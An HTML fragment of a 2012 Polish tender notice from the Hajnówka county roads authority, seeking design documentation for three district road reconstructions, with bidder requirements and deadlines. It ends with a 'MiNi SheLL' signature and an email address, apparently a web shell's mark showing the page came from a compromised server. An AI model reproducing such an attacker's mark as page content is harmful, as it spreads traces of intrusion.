<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zaparafowany projekt umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w przypadku:
-  zmiany regulacji prawnych obowiązujących w chwili zawarcia umowy,
-  zmiany danych dotyczących Zamawiającego lub Wykonawcy,
-  zmiany osób pełniących funkcje projektowe,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.hajnowka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych 17-200 Hajnówka ul. Bielska 41..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 10:00, miejsce: Zarząd Dróg Powiatowych 17-200 Hajnówka ul. Bielska 41..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1- Opracowanie dokumentacji na wykonanie przebudowy drogi powiatowej  Nr 1652 B Wólka Terechowska - Opaka Duża..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowo-kosztorysowej przebudowy i rozbudowy dróg powiatowych wraz z uzyskaniem nieprawomocnej decyzji o pozwoleniu na budowę, lub zgłoszenia budowy nie wymagającego pozwolenia na budowę, lub zezwolenia na realizację inwestycji drogowej.                  
Dane do projektowania:
- długość drogi - ok. 11, 5 km ( zakres opracowania: od granicy z Gminą Kleszczele- Opaka Duża - do  istniejącej nawierzchni bitumicznej we wsi Wólka Terechowska).
- klasa techniczna drogi - L,

Zakres przebudowy obejmuje:
- przebudowę/rozbudowę drogi- rodzaj projektowanej nawierzchni - potrójne powierzchniowe utrwalenie,
- budowę nowych i przebudowę istniejących przepustów - o ile zajdzie konieczność,
- przebudowę istniejących zjazdów - o ile zajdzie konieczność,   ,
- odmulenie i oczyszczenie rowów przydrożnych - o ile zajdzie konieczność,  
- przebudowę istniejących linii energetycznych - o ile zajdzie konieczność,
- przebudowę istniejących linii telekomunikacyjnych- o ile zajdzie konieczność,
- budowę kanałów technologicznych- o ile zajdzie konieczność,
- przebudowę istniejących sieci wodociągowych i kanalizacyjnych - o ile zajdzie konieczność,
- opracowanie i uzgodnienie  projektu stałej organizacji ruchu,
- inwentaryzacji drzew przeznaczonych do wycinki z naniesionymi numerami geod. działek  i zaznaczeniem ich lokalizacji na mapie zasadniczej wraz z podanie stanu własnościowego działek na których znajdują się drzewa przeznaczone do wycinki i danymi adresowymi właścicieli działek, sporządzenie wykazu drzew (wg numeracji naniesionej na mapie) z podaniem gatunku drzew, obwodu ich pni liczonym w centymetrach na wysokości 130 cm od poziomu gruntu oraz szacunkowo ocenioną wysokością drzew i numerami działek na których są usytuowane,  sporządzenie zestawienia ilości drzew przeznaczonych do wycinki na poszczególnych działkach.
- inne, które mogą wyniknąć w trakcie projektowania
- uzyskanie nieprawomocnej decyzji pozwolenia na budowę/zgłoszenia lub ZRID
- wykonanie pomiarów geodezyjnych i inwentaryzacji o ile takowe będą konieczne,
- przygotowanie materiałów niezbędnych do uzyskania decyzji o środowiskowych uwarunkowaniach, zgody na realizację przedsięwzięcia, decyzji o ustaleniu lokalizacji inwestycji celu publicznego, raportu o oddziaływaniu ma środowisko, uzyskanie pozwolenia wodno - prawnego i uzyskanie tych decyzji o ile takowe będą konieczne,
- opracowanie innych uznanych za niezbędne przez Wykonawcę, bądź stosowne instytucje i urzędy, opracowań badań analiz.
- pełnienie nadzoru autorskiego
  Zamawiający udostępnia podkład geodezyjny do celów projektowych w wersji papierowej i elektronicznej.
Wykonawca w celu prawidłowego opracowania oferty winien sprawdzić w terenie warunki wykonania zamówienia, jak również zgromadzić wszelkie niezbędne informacje w zakresie opracowania dokumentacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 1- Opracowanie dokumentacji na wykonanie przebudowy drogi powiatowej 
Nr 1652 B Wólka Terechowska - Opaka Duża..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowo-kosztorysowej przebudowy i rozbudowy dróg powiatowych wraz z uzyskaniem nieprawomocnej decyzji o pozwoleniu na budowę, lub zgłoszenia budowy nie wymagającego pozwolenia na budowę, lub zezwolenia na realizację inwestycji drogowej .
Dane do projektowania:
- łączna długość ulic Głównej, Parkowej i Leśnej wynosi- ok. 2,53 km 
- klasy techniczne drogi (ulic) - Z,L,

Zakres przebudowy obejmuje:
- przebudowę/rozbudowę ulic wraz z chodnikami i zjazdami. rodzaj projektowanej nawierzchni - nawierzchnia z betonu asfaltowego.
- budowę nowych i przebudowę istniejących przepustów, kanalizacji deszczowej,  rowów odwadniających  - o ile zajdzie konieczność,
- przebudowę istniejących linii energetycznych i oświetleniowych- o ile zajdzie konieczność,
- przebudowę istniejących linii telekomunikacyjnych- o ile zajdzie konieczność,
- budowę kanałów technologicznych- o ile zajdzie konieczność,
- przebudowę istniejących sieci wodociągowych i kanalizacyjnych - o ile zajdzie konieczność,
- rodzaj projektowanej nawierzchni - nawierzchnia z betonu asfaltowego.
- opracowanie i uzgodnienie projektu stałej organizacji ruchu,
- inwentaryzacji drzew przeznaczonych do wycinki z naniesionymi numerami inw.  i zaznaczeniem ich lokalizacji na mapie zasadniczej wraz z podanie stanu własnościowego działek na których znajdują się drzewa przeznaczone do wycinki z danymi adresowymi właścicieli działek, sporządzenie wykazu drzew (wg numeracji naniesionej na mapie) z podaniem gatunku drzew, obwodu ich pni liczonym w centymetrach na wysokości 130 cm od poziomu gruntu oraz szacunkowo ocenioną wysokością drzew i numerami działek na których są usytuowane,  sporządzenie zestawienia ilości drzew przeznaczonych do wycinki na poszczególnych działkach.
- inne, które mogą wyniknąć w trakcie projektowania.
- uzyskanie nieprawomocnej decyzji pozwolenia na budowę/zgłoszenia lub ZRID
 - wykonanie pomiarów geodezyjnych i inwentaryzacji o ile takowe będą konieczne,
- przygotowanie materiałów niezbędnych do uzyskania decyzji o środowiskowych uwarunkowaniach, zgody na realizację przedsięwzięcia, decyzji o ustaleniu lokalizacji inwestycji celu publicznego, raportu o oddziaływaniu ma środowisko, uzyskanie pozwolenia wodno - prawnego i uzyskanie tych decyzji o ile takowe będą konieczne,
- opracowanie innych uznanych za niezbędne przez Wykonawcę, bądź stosowne instytucje i urzędy, opracowań badań analiz.
- pełnienie nadzoru autorskiego.
Wykonawca zabezpiecza wszystkie materiały tj. między innymi  mapy, podkłady geodezyjne i inne.
Wykonawca w celu prawidłowego opracowania oferty winien sprawdzić w terenie warunki wykonania zamówienia, jak również zgromadzić wszelkie niezbędne informacje w zakresie opracowania dokumentacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Opracowanie dokumentacji na wykonanie przebudowy drogi powiatowej 
 Nr 1747 B  ul. Boćkowska w Kleszczelach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowo-kosztorysowej przebudowy i rozbudowy dróg powiatowych wraz z uzyskaniem nieprawomocnej decyzji o pozwoleniu na budowę, lub zgłoszenia budowy nie wymagającego pozwolenia na budowę, lub zezwolenia na realizację inwestycji drogowej.
Dane do projektowania:
- długość ulic Boćkowskiej wynosi- ok. 0,7 km (zakres od skrzyżowania z ul. Mickiewicza , do końca obszaru zabudowanego),
- klasy techniczne drogi (ulic) - Z,L,

Zakres przebudowy obejmuje:
- przebudowę/rozbudowę ulicy wraz z chodnikami i zjazdami, rodzaj projektowanej nawierzchni - nawierzchnia z betonu asfaltowego.
- budowę nowych i przebudowę istniejących przepustów, kanalizacji deszczowej,  rowów odwadniających  - o ile zajdzie konieczność,
- przebudowę istniejących linii energetycznych i oświetleniowych- o ile zajdzie konieczność,
- przebudowę istniejących linii telekomunikacyjnych- o ile zajdzie konieczność,
- budowę kanałów technologicznych- o ile zajdzie konieczność,
- przebudowę istniejących sieci wodociągowych i kanalizacyjnych - o ile zajdzie konieczność,
- opracowanie projektu stałej organizacji ruchu,
- inwentaryzacji drzew przeznaczonych do wycinki z naniesionymi numerami inw.  i zaznaczeniem ich lokalizacji na mapie zasadniczej wraz z podanie stanu własnościowego działek na których znajdują się drzewa przeznaczone do wycinki z danymi adresowymi właścicieli działek, sporządzenie wykazu drzew (wg numeracji naniesionej na mapie) z podaniem gatunku drzew, obwodu ich pni liczonym w centymetrach na wysokości 130 cm od poziomu gruntu oraz szacunkowo ocenioną wysokością drzew i numerami działek na których są usytuowane,  sporządzenie zestawienia ilości drzew przeznaczonych do wycinki na poszczególnych działkach.
- inne, które mogą wyniknąć w trakcie projektowania.
- uzyskanie nieprawomocnej decyzji pozwolenia na budowę/zgłoszenia lub ZRID
- wykonanie pomiarów geodezyjnych i inwentaryzacji o ile takowe będą konieczne,
- przygotowanie materiałów niezbędnych do uzyskania decyzji o środowiskowych uwarunkowaniach, zgody na realizację przedsięwzięcia, decyzji o ustaleniu lokalizacji inwestycji celu publicznego, raportu o oddziaływaniu ma środowisko, uzyskanie pozwolenia wodno - prawnego i uzyskanie tych decyzji o ile takowe będą konieczne,
- opracowanie innych uznanych za niezbędne przez Wykonawcę, bądź stosowne instytucje i urzędy, opracowań badań analiz.
- pełnienie nadzoru autorskiego.
Wykonawca zabezpiecza wszystkie materiały tj. między innymi  mapy, podkłady geodezyjne i inne.
Wykonawca w celu prawidłowego opracowania oferty winien sprawdzić w terenie warunki wykonania zamówienia, jak również zgromadzić wszelkie niezbędne informacje w zakresie opracowania dokumentacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com